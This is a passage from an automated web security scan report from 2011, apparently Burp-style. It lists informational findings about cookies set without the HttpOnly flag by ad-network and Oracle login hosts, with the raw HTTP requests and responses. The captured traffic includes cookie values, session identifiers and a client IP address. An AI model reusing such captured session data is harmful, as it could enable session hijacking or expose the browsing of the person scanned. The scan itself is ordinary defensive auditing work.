GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357 HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:13 GMT Set-Cookie: OAM_REQ=VERSION_4~1UuUhb3VlJjpjbcfM%2bCo%2b%2bMiWJ2ThT1j0zV2GIRgsiVXHKq1wWviikzjAmSMNpHcxw1rhPxnndOe6siHyjxtbEM%2buYuUn%2bUvYKd01%2bdN5qmbCefoBjLXOdBrDbalBGhTFH1mcenZ6VQcZOtiYN8%2b2RhWlQVpI0kTgRyqGG40EECD4CxAU4gDEYcZmI2B3wNkljoMdwVuaGWnut3Ws3E5AmamcNRVrdECimq1Mq%2f26%2bWfrUnoqmsx7kxOsJNewr%2bnbiYvS6wDHfxOtJWhU9pUItq8bUkoQwr7H5isBCh5meyvKe8ms68i55w4CahCTz3p6A01AM2dYBzGmRORCv6MqWPBKK5rVQPutfIo4HtNsfY2j5bm56F%2fzt94BzXXWxxsIhITfd%2b5we89fEJFZ2CTJgrZuXFNGB8jvQYx1YE6%2b7ASPoQu6ptzJ7jgdMAcNsxu50KMjCTA9dS18y7RfMmioWGVZaXuiTS26UzYRBWtMqgP6BhdQZSlRcjTcuc46NN8nrnPWOZL4K3h0yZI3vi8mV4sFUAHB2aS%2fObCAYn0yTQ3hhne5ezNrHo%2bH9c64NxLbPfw7eZU0b%2b4HhsFiPrF8I3JW0kUOq2JgvMJfMrL2huNN1Zpg%2bCEZraUo1TgPJ0143QFgYSJe1eczDw2MyCnfK3oh6Qtd7KYCYZqmx2UGJZqdGMHwEYjBtChCnZ%2bAYXC52A7T7BfE9%2bsU5UIViqxLMgLQufDXehYMfsh5xmRetJCVQjKlYhNt7oMAXSuo9O2k7OMGli%2fN4scZh0Pzed3GEjYCczp0U22FIrQ0m%2f%2bmzDHuyeEtas2vlW6JqELbY%2fxow1EezrQ%2bGYJaUxmUmB0yGsjb2F1Rp7CJPqKBgfXUpG7wnI326ZeV6pmgG9tMIY562dx0jU2RAMPJ1RgtCLRBoiQfe5PC4CVl2COVV%2fQGPEJ08Ey9H8gUzMJnEcE45wTXctneFvp7B%2bb%2fqrgJErqrGicSt5dbvcFIsmoCMx7XapdWZKlBi1mu98HJYyULu6G89uz7J7F1OUfVHXvohzzOrSr%2becHY4ndhIRFBwY5sSgv%2bNzfUhO9kDgCTx%2bkyBXZS4ENTxntnbFbXdYwDRUy3ced%2bRD1gv6b5Z1m46L2ASxzktwc8%2ft6h2e%2fZddmlbvJWSuAKXOVJnZPHeqq52brL9R2gKGGj8BrRjerqgBbjDog3QbuqH%2fVAGSNF0SzQwxZUJ6%2bWrNxH4KdRN3jYQrSX8x8LET%2fNACGe9jkZHVZWQKO6%2bAYVadrfVlSSL%2fxDUaDg6rdboxh8xYhMFUB1iAtoS0tCXjvv8L7w3iNda8ERdiiOKy%2bzqxzLqwOti%2bDPDfBmzK%2fPqcoG4eKrU2QS0uiJhNKc1LBvRBAcEjEA6JPJyO7fKHt9Cm61%2bSMW0H4YGmgW1TDtuQ81K00oZc%2bvp8PB%2f5uw3pu3y%2bMHs5TOOFMQv3Ndu%2b6mY%2bqO4nzv3w6U6u8b08hyFm08mgiATuuPlAlRk03u%2bjPRx2hAvWC8poLvKtS0wKaWl8DTa79BTB7DLE8gKChrkaHA2PeautfHjr5C7tfyfsR4L%2fPbtHU2Ei28ge9mNEOIcqrE5h53SVtUecGk51ABEcw%2bu%2f5cvPKa%2frIBDaoUQChQjGIrYSm1J8qODITQ2AJoAe%2fULjYYDVDNM9Mso54mrVWl%2fTy3IZhZNmrS0J5kUhi9G7LHhiUKSx7Y%2fC%2bSPs%2fgVaAtG2nE93v6Y%2b3XHD8w%2fvIU6%2fjajSgqSI5oTv%2bgjlFIUeIzqAc%2fJkSJ%2b8Im1uaWQrVWrz8LjrbXglHGh4%2fdkgqoMYyj85f5xa%2f0NxgBcbU%2bceGpsINAzmIfwo%3d; path=/; HttpOnly X-ORACLE-DMS-ECID: 0000J8zXBDg6uHK6EVADUS1EHWFB01t_b1 X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/ Content-Length: 3286 <html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
13.111. http://m1215.ic-live.com/522/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://m1215.ic-live.com
Path:
/522/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:44 GMT; Path=/ pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:44 GMT; Path=/ sid1215=1315327545U3aHt51RXPi099; Domain=.ic-live.com; Path=/ Coyote-2-a210828=a210872:0; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /522/?33083100&OVMTC=Broad&site=&creative=6492920360&OVKEY=beauty%20products&url_id=33083100 HTTP/1.1 Host: m1215.ic-live.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ngx_userid=50.23.123.106:1315327539133; pid2=1315301244rR4cN0jX2yM1; sid1460=1315327539qIJ0arLZTDmI99; cvt586=106159628; ngx_106159628=2011-09-06:09:45:39
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1Set-Cookie: ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:44 GMT; Path=/ Set-Cookie: pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:44 GMT; Path=/ Set-Cookie: sid1215=1315327545U3aHt51RXPi099; Domain=.ic-live.com; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT" Location: http://www.marykay.com/?pid=mk Date: Tue, 06 Sep 2011 16:45:44 GMTSet-Cookie: Coyote-2-a210828=a210872:0; path=/ Content-Length: 0
13.112. http://m1460.ic-live.com/586/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://m1460.ic-live.com
Path:
/586/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:40 GMT; Path=/ pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:40 GMT; Path=/ sid1460=1315327540EFWgV8Bzct0q99; Domain=.ic-live.com; Path=/ Coyote-2-a210828=a210874:0; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /586/?106159628&OVMTC=Phrase&site=&creative=9131745784&OVKEY=beauty%20product&url_id=106159628 HTTP/1.1 Host: m1460.ic-live.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pid2=1315301244rR4cN0jX2yM1
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1Set-Cookie: ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:40 GMT; Path=/ Set-Cookie: pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:40 GMT; Path=/ Set-Cookie: sid1460=1315327540EFWgV8Bzct0q99; Domain=.ic-live.com; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT" Location: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google Date: Tue, 06 Sep 2011 16:45:40 GMTSet-Cookie: Coyote-2-a210828=a210874:0; path=/ Content-Length: 0
13.113. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://netsuite.tt.omtrdc.net
Path:
/m2/netsuite/mbox/standard
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:32:28 GMT; Path=/m2/netsuite The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1 Host: netsuite.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM"Set-Cookie: mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:32:28 GMT; Path=/m2/netsuite Content-Type: text/javascript Content-Length: 173 Date: Tue, 06 Sep 2011 15:32:27 GMT Server: Test & Target mboxFactories.get('default').get('me-ecomm-form-test',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315341135013-154927.19");
13.114. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oasc12059.247realmedia.com
Path:
/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:RMFD=011R0ynx; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1 HTTP/1.1 Host: oasc12059.247realmedia.com Proxy-Connection: keep-alive Referer: http://www.cvs.com/CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:47:21 GMT Server: Apache/2.2.3 (Red Hat)Set-Cookie: RMFD=011R0ynx; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 807 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/;httponly document.write ('<script language="JavaScript" type="text/javascript" src="https://view.atdmt.com/DEN/jview/328347987/direct/01/823358824?click=http://oasc12059.247realmedia.com/RealMedia/ads/click_lx...[SNIP]...
13.115. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/6451/11953/20435-15.js
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=60; path=/; domain=.rubiconproject.com ses15=9844^2&11953^4; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61374; path=/; domain=.rubiconproject.com csi15=2553663.js^1^1315321025^1315321025&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:57:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com; The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/6451/11953/20435-15.js?cb=0.7766812939662486&keyword=%esid! HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=9844^2&11953^2; csi15=1295156.js^2^1315320939^1315320950&638177.js^2^1315313132^1315313451
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:05 GMT Server: RAS/1.3 (Unix)Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=10; path=/; domain=.rubiconproject.comSet-Cookie: ses15=9844^2&11953^4; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61374; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"Set-Cookie: csi15=2553663.js^1^1315321025^1315321025&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:57:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: application/x-javascript Content-Length: 1735 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl); window.rubicon_ad = "2553663" ...[SNIP]...
13.116. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/6451/11953/20435-2.js
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=60; path=/; domain=.rubiconproject.com ses2=9844^2&11953^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61338; path=/; domain=.rubiconproject.com csi2=1295153.js^2^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; expires=Tue, 13-Sep-2011 14:57:41 GMT; max-age=604800; path=/; domain=.rubiconproject.com; The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/6451/11953/20435-2.js?cb=0.2368586107622832&keyword=%esid! HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6451/11953; ses15=9844^2&11953^5; csi15=2553663.js^2^1315321038^1315321048&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:41 GMT Server: RAS/1.3 (Unix)Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=10; path=/; domain=.rubiconproject.comSet-Cookie: ses2=9844^2&11953^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61338; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"Set-Cookie: csi2=1295153.js^2^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; expires=Tue, 13-Sep-2011 14:57:41 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: application/x-javascript Content-Length: 2097 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl); window.rubicon_ad = "1295153" ...[SNIP]...
13.117. http://optimized-by.rubiconproject.com/a/dk.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/dk.html
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=60; path=/; domain=.rubiconproject.com ses15=9844^2&11953^7; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61255; path=/; domain=.rubiconproject.com csi15=1295121.js^2^1315321144^1315321144&2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:59:04 GMT; max-age=604800; path=/; domain=.rubiconproject.com; The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:59:04 GMT Server: RAS/1.3 (Unix)Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=10; path=/; domain=.rubiconproject.comSet-Cookie: ses15=9844^2&11953^7; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61255; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"Set-Cookie: csi15=1295121.js^2^1315321144^1315321144&2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:59:04 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: text/html Content-Length: 1968 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="expires" content="0"> <style type="text/css"> body {margin:0px; padding:0px;} </style> <script type="tex...[SNIP]...
13.118. http://optimized-by.rubiconproject.com/a/dk.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/dk.js
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:rdk=6451/11953; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=60; path=/; domain=.rubiconproject.com ses15=9844^2&11953^10; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60243; path=/; domain=.rubiconproject.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/dk.js?defaulting_ad=x13d7d2.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^10; csi15=1300434.js^1^1315322155^1315322155&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451
Response
